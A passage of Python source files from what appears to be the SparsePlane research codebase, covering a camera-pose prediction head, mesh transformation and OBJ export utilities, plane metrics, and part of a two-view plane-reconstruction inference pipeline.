Registry for camera head in a generalized R-CNN model.
It takes feature maps from two images and predict relative camera transformation.
The registered object will be called with `obj(cfg, input_shape)`.
The call is expected to return an :class:`nn.module`.
"""
def build_camera_head(cfg):
"""
Build ROIHeads defined by `cfg.MODEL.ROI_HEADS.NAME`.
"""
name = cfg.MODEL.CAMERA_HEAD.NAME
return CAMERA_HEAD_REGISTRY.get(name)(cfg)
def conv2d(in_channels, out_channels, kernel_size=3, stride=1, padding=None):
return nn.Sequential(
nn.Conv2d(
in_channels,
out_channels,
kernel_size=kernel_size,
stride=stride,
padding=padding,
),
nn.BatchNorm2d(out_channels, eps=0.001, momentum=0.01),
nn.LeakyReLU(inplace=True),
)
def deconv2d(
scale_factor=2,
mode="nearest",
in_channels=256,
out_channels=128,
kernel_size=3,
stride=1,
padding=1,
):
return nn.Sequential(
torch.nn.Upsample(scale_factor=scale_factor, mode=mode),
nn.Conv2d(
in_channels,
out_channels,
kernel_size=kernel_size,
stride=stride,
padding=padding,
),
nn.BatchNorm2d(out_channels, eps=0.001, momentum=0.01),
nn.ReLU(inplace=True),
)
@CAMERA_HEAD_REGISTRY.register()
class PlaneRCNNCameraHead(nn.Module):
"""
The camera head for Plane RCNN
"""
def __init__(self, cfg):
super(PlaneRCNNCameraHead, self).__init__()
self.backbone_feature = cfg.MODEL.CAMERA_HEAD.BACKBONE_FEATURE
if self.backbone_feature == "p5":
self.convs_backbone = nn.Sequential(
conv2d(in_channels=256, out_channels=256, kernel_size=3, padding=1),
conv2d(in_channels=256, out_channels=256, kernel_size=3, padding=1),
)
elif self.backbone_feature == "p4":
self.convs_backbone = nn.Sequential(
conv2d(in_channels=256, out_channels=256, kernel_size=3, padding=1),
conv2d(in_channels=256, out_channels=256, kernel_size=3, padding=1),
nn.MaxPool2d(
kernel_size=2, stride=2, padding=0, dilation=1, ceil_mode=False
),
conv2d(in_channels=256, out_channels=512, kernel_size=3, padding=1),
conv2d(in_channels=512, out_channels=512, kernel_size=3, padding=1),
)
elif self.backbone_feature == "p3":
self.convs_backbone = nn.Sequential(
conv2d(in_channels=256, out_channels=256, kernel_size=3, padding=1),
conv2d(in_channels=256, out_channels=256, kernel_size=3, padding=1),
nn.MaxPool2d(
kernel_size=2, stride=2, padding=0, dilation=1, ceil_mode=False
),
conv2d(in_channels=256, out_channels=256, kernel_size=3, padding=1),
conv2d(in_channels=256, out_channels=256, kernel_size=3, padding=1),
nn.MaxPool2d(
kernel_size=2, stride=2, padding=0, dilation=1, ceil_mode=False
),
conv2d(in_channels=256, out_channels=512, kernel_size=3, padding=1),
conv2d(in_channels=512, out_channels=512, kernel_size=3, padding=1),
)
for block in self.convs_backbone:
if isinstance(block, nn.modules.container.Sequential):
for layer in block:
if isinstance(layer, nn.Conv2d):
weight_init.c2_msra_fill(layer)
else:
raise NotImplementedError
self.convs = nn.Sequential(
conv2d(in_channels=300, out_channels=128, kernel_size=3, padding=1),
conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=2, padding=1),
conv2d(in_channels=128, out_channels=128, kernel_size=3, padding=1),
conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=2, padding=1),
conv2d(in_channels=128, out_channels=128, kernel_size=3, padding=1),
conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=2, padding=1),
)
self.fc = nn.Linear(768, cfg.MODEL.CAMERA_HEAD.FEATURE_SIZE)
self.trans_branch = nn.Linear(
cfg.MODEL.CAMERA_HEAD.FEATURE_SIZE, cfg.MODEL.CAMERA_HEAD.TRANS_CLASS_NUM
)
self.rot_branch = nn.Linear(
cfg.MODEL.CAMERA_HEAD.FEATURE_SIZE, cfg.MODEL.CAMERA_HEAD.ROTS_CLASS_NUM
)
self._loss_weight = cfg.MODEL.CAMERA_HEAD.LOSS_WEIGHT
self.celoss = nn.CrossEntropyLoss()
def forward(self, features1, features2, gt_cls=None):
"""
p2 256*120*160
p3 256*60*80
p4 256*30*40
p5 256*15*20
p6 256*8*10
"""
x1 = self.backbone(features1)
x2 = self.backbone(features2)
aff = self.compute_corr_softmax(x1, x2)
x = self.convs(aff)
x = torch.flatten(x, 1)
x = F.relu(self.fc(x))
trans = self.trans_branch(x)
rot = self.rot_branch(x)
if self.training:
tran_loss = self.celoss(trans, gt_cls["tran_cls"].squeeze(1))
rot_loss = self.celoss(rot, gt_cls["rot_cls"].squeeze(1))
losses = {"camera_loss": tran_loss + rot_loss}
if torch.isnan(tran_loss) or torch.isnan(rot_loss):
import pdb; pdb.set_trace()
return losses
else:
return {"tran": trans, "rot": rot}
def backbone(self, features):
x = self.convs_backbone(features[self.backbone_feature])
return x
def compute_corr_softmax(self, im_feature1, im_feature2):
_, _, h1, w1 = im_feature1.size()
_, _, h2, w2 = im_feature2.size()
im_feature2 = im_feature2.transpose(2, 3)
im_feature2_vec = im_feature2.contiguous().view(
im_feature2.size(0), im_feature2.size(1), -1
)
im_feature2_vec = im_feature2_vec.transpose(1, 2)
im_feature1_vec = im_feature1.contiguous().view(
im_feature1.size(0), im_feature1.size(1), -1
)
corrfeat = torch.matmul(im_feature2_vec, im_feature1_vec)
corrfeat = corrfeat.view(corrfeat.size(0), h2 * w2, h1, w1)
corrfeat = F.softmax(corrfeat, dim=1)
return corrfeat
```
#### File: sparseplane/utils/mesh_utils.py
```python
import cv2
import os
import shutil
import quaternion
import torch
import numpy as np
from typing import Optional
import imageio
from tqdm import tqdm
from pytorch3d.structures import Meshes
from pytorch3d.renderer import TexturesVertex
from pytorch3d.structures import utils as struct_utils
from sparseplane.utils.camera import (
create_cylinder_mesh,
create_color_palette,
get_cone_edges,
)
def transform_meshes(meshes, camera_info):
"""
input:
@meshes: mesh in local frame
@camera_info: plane params from camera info, type = dict, must contain 'position' and 'rotation' as keys
output:
mesh in global frame.
"""
tran = camera_info["position"]
rot = camera_info["rotation"]
verts_packed = meshes.verts_packed()
verts_packed = verts_packed * torch.tensor(
[1.0, -1.0, -1.0], dtype=torch.float32
) # suncg2habitat
faces_list = meshes.faces_list()
tex = meshes.textures
rot_matrix = torch.tensor(quaternion.as_rotation_matrix(rot), dtype=torch.float32)
verts_packed = torch.mm(rot_matrix, verts_packed.T).T + torch.tensor(
tran, dtype=torch.float32
)
verts_list = list(verts_packed.split(meshes.num_verts_per_mesh().tolist(), dim=0))
return Meshes(verts=verts_list, faces=faces_list, textures=tex)
def rotate_mesh_for_webview(meshes):
"""
input:
@meshes: mesh in global (habitat) frame
output:
mesh is rotated around x axis by -11 degrees such that floor is horizontal
"""
verts_packed = meshes.verts_packed()
faces_list = meshes.faces_list()
tex = meshes.textures
rot_matrix = torch.FloatTensor(
np.linalg.inv(
np.array([[1, 0, 0], [0, 0.9816272, -0.1908090], [0, 0.1908090, 0.9816272]])
)
)
verts_packed = torch.mm(rot_matrix, verts_packed.T).T
verts_list = list(verts_packed.split(meshes.num_verts_per_mesh().tolist(), dim=0))
return Meshes(verts=verts_list, faces=faces_list, textures=tex)
def transform_verts_list(verts_list, camera_info):
"""
input:
@meshes: verts_list in local frame
@camera_info: plane params from camera info, type = dict, must contain 'position' and 'rotation' as keys
output:
verts_list in global frame.
"""
tran = camera_info["position"]
rot = camera_info["rotation"]
verts_list_to_packed = struct_utils.list_to_packed(verts_list)
verts_packed = verts_list_to_packed[0]
num_verts_per_mesh = verts_list_to_packed[1]
verts_packed = verts_packed * torch.tensor(
[1.0, -1.0, -1.0], dtype=torch.float32
) # suncg2habitat
rot_matrix = torch.tensor(quaternion.as_rotation_matrix(rot), dtype=torch.float32)
verts_packed = torch.mm(rot_matrix, verts_packed.T).T + torch.tensor(
tran, dtype=torch.float32
)
verts_list = list(verts_packed.split(num_verts_per_mesh.tolist(), dim=0))
return verts_list
def get_plane_params_in_global(planes, camera_info):
"""
input:
@planes: plane params
@camera_info: plane params from camera info, type = dict, must contain 'position' and 'rotation' as keys
output:
plane parameters in global frame.
"""
tran = camera_info["position"]
rot = camera_info["rotation"]
start = np.ones((len(planes), 3)) * tran
end = planes * np.array([1, -1, -1]) # suncg2habitat
end = (quaternion.as_rotation_matrix(rot) @ (end).T).T + tran # cam2world
a = end
b = end - start
planes_world = ((a * b).sum(axis=1) / np.linalg.norm(b, axis=1) ** 2).reshape(-1, 1) * b
return planes_world
def get_plane_params_in_local(planes, camera_info):
"""
input:
@planes: plane params
@camera_info: plane params from camera info, type = dict, must contain 'position' and 'rotation' as keys
output:
plane parameters in global frame.
"""
tran = camera_info["position"]
rot = camera_info["rotation"]
b = planes
a = np.ones((len(planes), 3)) * tran
planes_world = (
a
+ b
- ((a * b).sum(axis=1) / np.linalg.norm(b, axis=1) ** 2).reshape(-1, 1) * b
)
end = (
quaternion.as_rotation_matrix(rot.inverse()) @ (planes_world - tran).T
).T # world2cam
planes_local = end * np.array([1, -1, -1]) # habitat2suncg
return planes_local
def save_obj(
folder,
prefix,
meshes,
cam_meshes=None,
decimal_places=None,
blend_flag=False,
map_files=None,
uv_maps=None,
):
os.makedirs(folder, exist_ok=True)
# pytorch3d does not support map_files
# map_files = meshes.textures.map_files()
# assert map_files is not None
if map_files is None and uv_maps is None:
raise RuntimeError("either map_files or uv_maps should be set!")
# generate map_files from uv_map
if uv_maps is not None and map_files is None:
map_files = []
uv_dir = os.path.join(folder, "uv_maps")
if not os.path.exists(uv_dir):
os.mkdir(uv_dir)
for map_id, uv_map in enumerate(uv_maps):
uv_path = os.path.join(uv_dir, "{}_uv_plane_{}.png".format(prefix, map_id))
imageio.imwrite(uv_path, uv_map)
map_files.append(uv_path)
f_mtl = open(os.path.join(folder, prefix + ".mtl"), "w")
f = open(os.path.join(folder, prefix + ".obj"), "w")
try:
seen = set()
uniq_map_files = [
m for m in list(map_files) if m not in seen and not seen.add(m)
]
for map_id, map_file in enumerate(uniq_map_files):
if uv_maps is not None:
# we do not need to copy map_files,
# they are already in uv_maps/...
f_mtl.write(
_get_mtl_map(
os.path.basename(map_file).split(".")[0],
os.path.join("uv_maps", os.path.basename(map_file)),
)
)
continue
if not blend_flag:
shutil.copy(map_file, folder)
os.chmod(os.path.join(folder, os.path.basename(map_file)), 0o755)
f_mtl.write(
_get_mtl_map(
os.path.basename(map_file).split(".")[0],
os.path.basename(map_file),
)
)
else:
rgb = cv2.imread(map_file, cv2.IMREAD_COLOR)
if cam_meshes is not None:
blend_color = (
np.array(
cam_meshes.textures.verts_features_packed()
.numpy()
.tolist()[map_id]
)
* 255
)
else:
blend_color = np.array(create_color_palette()[map_id + 10])
alpha = 0.7
blend = (rgb * alpha + blend_color[::-1] * (1 - alpha)).astype(np.uint8)
cv2.imwrite(
os.path.join(
folder, os.path.basename(map_file).split(".")[0] + "_debug.png"
),
blend,
)
f_mtl.write(
_get_mtl_map(
os.path.basename(map_file).split(".")[0],
os.path.basename(map_file).split(".")[0] + "_debug.png",
)
)
f.write(f"mtllib {prefix}.mtl\n\n")
# we want [list] verts, vert_uvs, map_files;
# [packed] faces;
# face per mesh
verts_list = meshes.verts_list()
verts_uvs_list = meshes.textures.verts_uvs_list()
faces_list = meshes.faces_packed().split(
meshes.num_faces_per_mesh().tolist(), dim=0
)
for idx, (verts, verts_uvs, faces, map_file) in enumerate(
zip(verts_list, verts_uvs_list, faces_list, map_files)
):
f.write(f"# mesh {idx}\n")
trunc_verts_uvs = verts_uvs[: verts.shape[0]]
_save(
f,
verts,
faces,
verts_uv=trunc_verts_uvs,
map_file=map_file,
idx=idx,
decimal_places=decimal_places,
)
if cam_meshes:
face_offset = np.sum([len(v) for v in verts_list])
cam_verts_list = cam_meshes.verts_list()
cam_verts_rgbs_list = (
cam_meshes.textures.verts_features_packed().numpy().tolist()
)
cam_faces_list = (cam_meshes.faces_packed() + face_offset).split(
cam_meshes.num_faces_per_mesh().tolist(), dim=0
)
assert len(cam_verts_rgbs_list) == len(cam_verts_list)
for idx, (verts, faces, rgb) in enumerate(
zip(cam_verts_list, cam_faces_list, cam_verts_rgbs_list)
):
f.write(f"# camera {idx}\n")
f_mtl.write(_get_mtl_rgb(idx, rgb))
_save(f, verts, faces, rgb=rgb, idx=idx, decimal_places=decimal_places)
finally:
f.close()
f_mtl.close()
def _get_mtl_map(material_name, map_Kd):
return f"""newmtl {material_name}
map_Kd {map_Kd}
# Test colors
Ka 1.000 1.000 1.000 # white
Kd 1.000 1.000 1.000 # white
Ks 0.000 0.000 0.000 # black
Ns 10.0\n"""
def _get_mtl_rgb(material_idx, rgb):
return f"""newmtl color_{material_idx}
Kd {rgb[0]} {rgb[1]} {rgb[2]}
Ka 0.000 0.000 0.000\n"""
def _save(
f,
verts,
faces,
verts_uv=None,
map_file=None,
rgb=None,
idx=None,
double_sided=True,
decimal_places: Optional[int] = None,
):
if decimal_places is None:
float_str = "%f"
else:
float_str = "%" + ".%df" % decimal_places
lines = ""
V, D = verts.shape
for i in range(V):
vert = [float_str % verts[i, j] for j in range(D)]
lines += "v %s\n" % " ".join(vert)
if verts_uv is not None:
V, D = verts_uv.shape
for i in range(V):
vert_uv = [float_str % verts_uv[i, j] for j in range(D)]
lines += "vt %s\n" % " ".join(vert_uv)
if map_file is not None:
lines += f"usemtl {os.path.basename(map_file).split('.')[0]}\n"
elif rgb is not None:
lines += f"usemtl color_{idx}\n"
if faces != []:
F, P = faces.shape
for i in range(F):
if verts_uv is not None:
face = ["%d/%d" % (faces[i, j] + 1, faces[i, j] + 1) for j in range(P)]
else:
face = ["%d" % (faces[i, j] + 1) for j in range(P)]
lines += "f %s\n" % " ".join(face)
if double_sided:
if verts_uv is not None:
face = [
"%d/%d" % (faces[i, j] + 1, faces[i, j] + 1)
for j in reversed(range(P))
]
else:
face = ["%d" % (faces[i, j] + 1) for j in reversed(range(P))]
lines += "f %s\n" % " ".join(face)
else:
tqdm.write(f"face = []")
f.write(lines)
def get_camera_meshes(camera_list, radius=0.02):
verts_list = []
faces_list = []
color_list = []
rots = np.array(
[
quaternion.as_rotation_matrix(camera_info["rotation"])
for camera_info in camera_list
]
)
# ai habitat frame
lookat = np.array([0, 0, -1])
vertical = np.array([0, 1, 0])
positions = np.array([camera_info["position"] for camera_info in camera_list])
lookats = rots @ lookat.T
verticals = rots @ vertical.T
predetermined_color = [
[0.10196, 0.32157, 1.0],
[1.0, 0.0667, 0.1490],
]
for idx, (position, lookat, vertical, color) in enumerate(
zip(positions, lookats, verticals, predetermined_color)
):
cur_num_verts = 0
edges = get_cone_edges(position, lookat, vertical)
cam_verts = []
cam_inds = []
for k in range(len(edges)):
cyl_verts, cyl_ind = create_cylinder_mesh(radius, edges[k][0], edges[k][1])
cyl_verts = [x for x in cyl_verts]
cyl_ind = [x + cur_num_verts for x in cyl_ind]
cur_num_verts += len(cyl_verts)
cam_verts.extend(cyl_verts)
cam_inds.extend(cyl_ind)
# Create a textures object
verts_list.append(torch.tensor(cam_verts, dtype=torch.float32))
faces_list.append(torch.tensor(cam_inds, dtype=torch.float32))
color_list.append(color)
color_tensor = torch.tensor(color_list, dtype=torch.float32).unsqueeze_(1)
tex = TexturesVertex(verts_features=color_tensor)
# Initialise the mesh with textures
meshes = Meshes(verts=verts_list, faces=faces_list, textures=tex)
return meshes
```
#### File: sparseplane/utils/metrics.py
```python
import torch
import numpy as np
@torch.no_grad()
def compare_planes(
pred_planes,
gt_planes,
):
"""
naively calculate 3d vector l2 distance
"""
pred_planes = torch.tensor(np.array(pred_planes), dtype=torch.float32)
pred_offsets = torch.norm(pred_planes, p=2, dim=1) + 1e-5
pred_norms = pred_planes.div(pred_offsets.view(-1, 1).expand_as(pred_planes))
gt_planes = torch.tensor(np.array(gt_planes), dtype=torch.float32)
gt_offsets = torch.norm(gt_planes, p=2, dim=1) + 1e-5
gt_norms = gt_planes.div(gt_offsets.view(-1, 1).expand_as(gt_planes))
norm_distance_matrix = torch.clamp(torch.cdist(pred_norms, gt_norms, p=2), 0, 2)
norm_angle_matrix = 2 * torch.asin(norm_distance_matrix / 2) / np.pi * 180
offset_distance_matrix = torch.cdist(
pred_offsets.view(-1, 1), gt_offsets.view(-1, 1), p=1
)
return {"norm": norm_angle_matrix, "offset": offset_distance_matrix}
def compare_planes_one_to_one(
pred_planes,
gt_planes,
):
pred_planes = torch.tensor(np.array(pred_planes), dtype=torch.float32)
pred_offsets = torch.clamp(torch.norm(pred_planes, p=2, dim=1), min=1e-5)
pred_norms = pred_planes.div(pred_offsets.view(-1, 1).expand_as(pred_planes))
gt_planes = torch.tensor(np.array(gt_planes), dtype=torch.float32)
gt_offsets = torch.clamp(torch.norm(gt_planes, p=2, dim=1), min=1e-5)
gt_norms = gt_planes.div(gt_offsets.view(-1, 1).expand_as(gt_planes))
l2 = torch.norm(pred_planes - gt_planes, dim=1).numpy().mean()
norm = (
torch.acos(torch.clamp(torch.sum(pred_norms * gt_norms, dim=1), max=1, min=-1))
.numpy()
.mean()
)
offset = torch.abs(pred_offsets - gt_offsets).numpy().mean()
return {"l2": l2, "norm": norm, "offset": offset}
```
#### File: sparsePlane/tools/inference_sparse_plane.py
```python
import numpy as np
import argparse, os, cv2, torch, pickle, quaternion
import pycocotools.mask as mask_util
from collections import defaultdict
from tqdm import tqdm
from scipy.linalg import eigh
from scipy.ndimage.measurements import center_of_mass
from scipy.special import softmax
from scipy.optimize import least_squares
from detectron2.config import get_cfg
from detectron2.engine import DefaultPredictor
from detectron2.evaluation.coco_evaluation import instances_to_coco_json
from detectron2.data import detection_utils as utils
from detectron2.utils.visualizer import Visualizer
from pytorch3d.structures import join_meshes_as_batch
from sparseplane.config import get_sparseplane_cfg_defaults
from sparseplane.modeling.roi_heads.plane_loss import GeoConsistencyLoss
from sparseplane.utils.mesh_utils import (
save_obj,
get_camera_meshes,
transform_meshes,
rotate_mesh_for_webview,
get_plane_params_in_global,
get_plane_params_in_local,
)
from sparseplane.utils.vis import get_single_image_mesh_plane
from sparseplane.visualization import create_instances, get_labeled_seg, draw_match
import KMSolver
from local_refinement_sift import (
get_pixel_matching,
vec6dToSo3,
rotation_matrix_from_array,
so3ToVec6d,
fun_with_precalculated_sift_reduce_rot,
)
def km_solver(distance_matrix, weight):
"""
km: Hungarian Algo
if the distance > threshold, even it is smallest, it is also false.
"""
cost_matrix = (distance_matrix.numpy() * 1000).astype(np.int)
prediction_matrix_km = KMSolver.solve(
cost_matrix, threshold=int((1 - weight["threshold"]) * 1000)
)
return prediction_matrix_km
class PlaneRCNN_Branch:
def __init__(self, cfg, cpu_device="cpu"):
self.predictor = DefaultPredictor(cfg)
self._cpu_device = cpu_device
self._K_inv_dot_xy_1 = torch.FloatTensor(self.get_K_inv_dot_xy_1()).to("cuda")
self._camera_on = cfg.MODEL.CAMERA_ON
self._embedding_on = cfg.MODEL.EMBEDDING_ON
self.img_format = cfg.INPUT.FORMAT
def inference(
self,
img_file1,
img_file2,
):
"""
input: im0, im1 path.
"""
im0 = utils.read_image(img_file1, format=self.img_format)
im1 = utils.read_image(img_file2, format=self.img_format)
# Equivalent
# im0 = cv2.imread(img_file1)
# im1 = cv2.imread(img_file2)
im0 = cv2.resize(im0, (640, 480))
im1 = cv2.resize(im1, (640, 480))
im0 = torch.as_tensor(im0.transpose(2, 0, 1).astype("float32"))
im1 = torch.as_tensor(im1.transpose(2, 0, 1).astype("float32"))
with torch.no_grad():
pred = self.predictor.model([{"0": {"image": im0}, "1": {"image": im1}}])[0]
return pred
def process(self, output):
prediction = {"0": {}, "1": {}}
tmp_instances = {"0": {}, "1": {}}
for i in range(2):
if "instances" in output[str(i)]:
instances = output[str(i)]["instances"].to(self._cpu_device)
prediction[str(i)]["instances"] = instances_to_coco_json(
instances, "demo"
)
prediction[str(i)]["pred_plane"] = output[str(i)][
"instances"
].pred_plane.to(self._cpu_device)
tmp_instances[str(i)]["embeddingbox"] = {
"pred_boxes": instances.pred_boxes,
"scores": instances.scores,
}
if "proposals" in output[str(i)]:
prediction[str(i)]["proposals"] = output[str(i)]["proposals"].to(
self._cpu_device
)
if output["depth"][str(i)] is not None:
prediction[str(i)]["pred_depth"] = output["depth"][str(i)].to(
self._cpu_device
)
xyz = self.depth2XYZ(output["depth"][str(i)])
prediction[str(i)] = self.override_depth(xyz, prediction[str(i)])
if self._embedding_on:
if "pred_aff" in output:
tmp_instances["pred_aff"] = output["pred_aff"].to(self._cpu_device)
if "geo_aff" in output:
tmp_instances["geo_aff"] = output["geo_aff"].to(self._cpu_device)
if "emb_aff" in output:
tmp_instances["emb_aff"] = output["emb_aff"].to(self._cpu_device)
prediction["corrs"] = tmp_instances
if self._camera_on:
camera_dict = {
"logits": {
"tran": output["camera"]["tran"].to(self._cpu_device),
"rot": output["camera"]["rot"].to(self._cpu_device),
},
"logits_sms": {
"tran": softmax(output["camera"]["tran"].to(self._cpu_device)),
"rot": softmax(output["camera"]["rot"].to(self._cpu_device)),
},
}
prediction["camera"] = camera_dict
return prediction
def depth2XYZ(self, depth):
"""
Convert depth to point clouds
X - width
Y - depth
Z - height
"""
XYZ = self._K_inv_dot_xy_1 * depth
return XYZ
@staticmethod
def get_K_inv_dot_xy_1(h=480, w=640):
focal_length = 517.97
offset_x = 320
offset_y = 240
K = [[focal_length, 0, offset_x], [0, focal_length, offset_y], [0, 0, 1]]
K_inv = np.linalg.inv(np.array(K))
K_inv_dot_xy_1 = np.zeros((3, h, w))
for y in range(h):
for x in range(w):
yy = float(y) / h * 480
xx = float(x) / w * 640
ray = np.dot(K_inv, np.array([xx, yy, 1]).reshape(3, 1))
K_inv_dot_xy_1[:, y, x] = ray[:, 0]
return K_inv_dot_xy_1.reshape(3, h, w)
@staticmethod
def override_depth(xyz, instance):
pred_masks = [p["segmentation"] for p in instance["instances"]]
override_list = []
for mask, plane in zip(pred_masks, instance["pred_plane"]):
bimask = mask_util.decode(mask)
if bimask.sum() == 0:
override_list.append(plane)
continue
xyz_tmp = xyz[:, torch.BoolTensor(bimask)]
offset = np.linalg.norm(plane)
normal = plane / max(offset, 1e-8)
offset_new = (normal @ xyz_tmp.cpu().numpy()).mean()
override_list.append(normal * offset_new)
if len(override_list) > 0:
instance["pred_plane"] = torch.stack(override_list)
return instance
class Camera_Branch:
def __init__(self, d2_cfg):
self.cfg = d2_cfg
if self.cfg.MODEL.CAMERA_ON:
with open(self.cfg.MODEL.CAMERA_HEAD.KMEANS_TRANS_PATH, "rb") as f:
self.kmeans_trans = pickle.load(f)
with open(self.cfg.MODEL.CAMERA_HEAD.KMEANS_ROTS_PATH, "rb") as f:
self.kmeans_rots = pickle.load(f)
def xyz2class(self, x, y, z):
return self.kmeans_trans.predict([[x, y, z]])
def quat2class(self, w, xi, yi, zi):
return self.kmeans_rots.predict([[w, xi, yi, zi]])
def class2xyz(self, cls):
assert (cls >= 0).all() and (cls < self.kmeans_trans.n_clusters).all()
return self.kmeans_trans.cluster_centers_[cls]
def class2quat(self, cls):
assert (cls >= 0).all() and (cls < self.kmeans_rots.n_clusters).all()
return self.kmeans_rots.cluster_centers_[cls]
def get_rel_camera(self, pred_dict, tran_topk=0, rot_topk=0):
sorted_idx_tran = np.argsort(pred_dict["camera"]["logits"]["tran"].numpy())[
::-1
]
sorted_idx_rot = np.argsort(pred_dict["camera"]["logits"]["rot"].numpy())[::-1]
tran = self.class2xyz(sorted_idx_tran[tran_topk])
rot = self.class2quat(sorted_idx_rot[rot_topk])
if "logits_sms" in pred_dict["camera"].keys():
tran_p = pred_dict["camera"]["logits_sms"]["tran"][sorted_idx_tran[tran_topk]]
rot_p = pred_dict["camera"]["logits_sms"]["rot"][sorted_idx_rot[rot_topk]]
else:
tran_p = softmax(pred_dict["camera"]['logits']["tran"])[sorted_idx_tran[tran_topk]]
rot_p = softmax(pred_dict["camera"]['logits']["rot"])[sorted_idx_rot[rot_topk]]
camera_info = {
"position": tran,
"position_prob": tran_p,
"rotation": rot,
"rotation_prob": rot_p,
}
return camera_info
class Discrete_Optimizer:
def __init__(self, cfg):
self.weight = {
"threshold": 0.7,
"lambda_emb": 0.47,
"lambda_geo_l2": 0.00,
"l2_clamp": 5,
"lambda_geo_normal": 0.25,
"lambda_geo_offset": 0.28,
"offset_clamp": 4,
"topk_tran": 32,
"topk_rot": 32,
# [assignment.sum(), pred_cam['position_prob'], pred_cam['rotation_prob'], (embedding_matrix*assignment).numpy().mean(),
# (l2_matrix*assignment).numpy().mean(), (normal_matrix*assignment).numpy().mean(), (offset_matrix*assignment).numpy().mean(),
# [assignment.sum(), log(pcam_tran), log(pcam_rot), distance*assignment]
"score_weight": [0.311, 0.166, 0.092, -0.432],
"assignment": "km_search_cam",
}
# Initialize camera
self.camera_branch = Camera_Branch(d2_cfg=cfg)
# class for geometric distance
self.geo_consistency_loss = GeoConsistencyLoss("cpu")
def optimize(self, pred_dict):
embedding_matrix = 1 - pred_dict["corrs"]["pred_aff"]
weight = self.weight
# discrete optimization
best_score = np.NINF
best_assignment = None
best_camera = None
best_tran_topk = None
best_rot_topk = None
best_distance_m = None
score_weight = np.array(weight["score_weight"]).reshape(-1, 1)
for k_tran in range(weight["topk_tran"]):
for k_rot in range(weight["topk_rot"]):
pred_cam = self.camera_branch.get_rel_camera(pred_dict, k_tran, k_rot)
geo_matrix = defaultdict(dict)
# l2
(
geo_distance_matrix,
numPlanes1,
numPlanes2,
) = self.geo_consistency_loss.inference(
[pred_dict["0"]], [pred_dict["1"]], [pred_cam], distance="l2"
)
geo_matrix.update(geo_distance_matrix)
# normal angle
(
normal_angle_matrix,
numPlanes1,
numPlanes2,
) = self.geo_consistency_loss.inference(
[pred_dict["0"]], [pred_dict["1"]], [pred_cam], distance="normal"
)
geo_matrix.update(normal_angle_matrix)
l2_matrix = (
np.clip(geo_matrix["l2"], 0, weight["l2_clamp"])
/ weight["l2_clamp"]
)
normal_matrix = geo_matrix["normal"] / np.pi
offset_matrix = (
np.clip(geo_matrix["offset"], 0, weight["offset_clamp"])
/ weight["offset_clamp"]
)
distance_matrix = (
weight["lambda_emb"] * embedding_matrix
+ weight["lambda_geo_l2"] * l2_matrix
+ weight["lambda_geo_normal"] * normal_matrix
+ weight["lambda_geo_offset"] * offset_matrix
)
assignment = km_solver(distance_matrix[0], weight=weight)
x = np.array(
[
assignment.sum(),
np.log(pred_cam["position_prob"]),
np.log(pred_cam["rotation_prob"]),
(distance_matrix * assignment).numpy().mean(),
]
)
score = x @ score_weight
if score > best_score:
best_score = score
best_assignment = assignment
best_distance_m = distance_matrix
best_camera = pred_cam
best_tran_topk = k_tran
best_rot_topk = k_rot
return {
"best_camera": best_camera,
"best_assignment": best_assignment,
"distance_m": best_distance_m,
"best_tran_topk": best_tran_topk,
"best_rot_topk": best_rot_topk,
}
class Continuous_Optimizer:
def __init__(self):
self.weight = {
"huber_delta": 0.01,
"lambda_R": 1.0,
}
def optimize(self, img_file1, img_file2, pred_dict, optimized_dict):
"""
Initialize camera pose
"""
init_R = optimized_dict["best_camera"]["rotation"]
init_T = optimized_dict["best_camera"]["position"]
x0 = np.concatenate((so3ToVec6d(rotation_matrix_from_array(init_R)), init_T))
"""
Select correspondence assignment
"""
assignment_m = optimized_dict["best_assignment"]
assignment = np.argwhere(assignment_m)
"""
Select plane params
"""
x1_full = np.array(pred_dict["0"]["pred_plane"])
x2_full = np.array(pred_dict["1"]["pred_plane"])
if len(assignment) == 0:
rtn = {
"n_corr": len(assignment),
"cost": 0,
"best_camera": {"position": init_T, "rotation": init_R},
"best_assignment": assignment_m,
"plane_param_override": {"0": x1_full, "1": x2_full},
}
return rtn
x1 = x1_full[assignment[:, 0]]
x2 = x2_full[assignment[:, 1]]
"""
Select optimized function
"""
boxes1 = np.array([inst["bbox"] for inst in pred_dict["0"]["instances"]])[
assignment[:, 0]
]
boxes2 = np.array([inst["bbox"] for inst in pred_dict["1"]["instances"]])[
assignment[:, 1]
]
segms1 = np.array(
[inst["segmentation"] for inst in pred_dict["0"]["instances"]]
)[assignment[:, 0]]
segms2 = np.array(
[inst["segmentation"] for inst in pred_dict["1"]["instances"]]
)[assignment[:, 1]]
offsets1 = np.linalg.norm(x1, axis=1)
normals1 = x1 / (offsets1.reshape(-1, 1) + 1e-5)
offsets2 = np.linalg.norm(x2, axis=1)
normals2 = x2 / (offsets2.reshape(-1, 1) + 1e-5)
x0 = np.concatenate((x0, offsets1, offsets2))
img1 = cv2.imread(img_file1, cv2.IMREAD_COLOR)[:, :, ::-1]
img2 = cv2.imread(img_file2, cv2.IMREAD_COLOR)[:, :, ::-1]
img1 = cv2.resize(img1, (640, 480))
img2 = cv2.resize(img2, (640, 480))
xys1, xys2 = [], []
for i in range(len(boxes1)):
try:
xy1, xy2 = get_pixel_matching(
img1, boxes1[i], segms1[i], x1[i], img2, boxes2[i], segms2[i], x2[i]
)
except:
xy1 = []
xy2 = []
xys1.append(np.array(xy1))
xys2.append(np.array(xy2))
rst = least_squares(
fun_with_precalculated_sift_reduce_rot,
x0,
args=(
len(boxes1),
img1,
xys1,
normals1,
img2,
xys2,
normals2,
rotation_matrix_from_array(init_R),
self.weight,
),
)
offsets1 = rst.x[9 : 9 + len(boxes1)]
offsets2 = rst.x[9 + len(boxes1) : 9 + len(boxes1) * 2]
x1_full[assignment[:, 0]] = offsets1.reshape(-1, 1) * normals1
x2_full[assignment[:, 1]] = offsets2.reshape(-1, 1) * normals2
pred_R = quaternion.as_float_array(
quaternion.from_rotation_matrix(vec6dToSo3(rst.x[:6]))
)
pred_T = rst.x[6:9]
rtn = {
"n_corr": len(assignment),
"cost": rst.cost,
"best_camera": {"position": pred_T, "rotation": pred_R},
"best_assignment": assignment_m,
"plane_param_override": {"0": x1_full, "1": x2_full},
}
return rtn
def save_matching(
img_file1,
img_file2,
pred_dict,
assignment,
output_dir,
prefix="",
paper_img=False,
score_threshold=0.7,
):
"""
fp: whether show fp or fn
gt_box: whether use gtbox
"""
image_paths = {"0": img_file1, "1": img_file2}
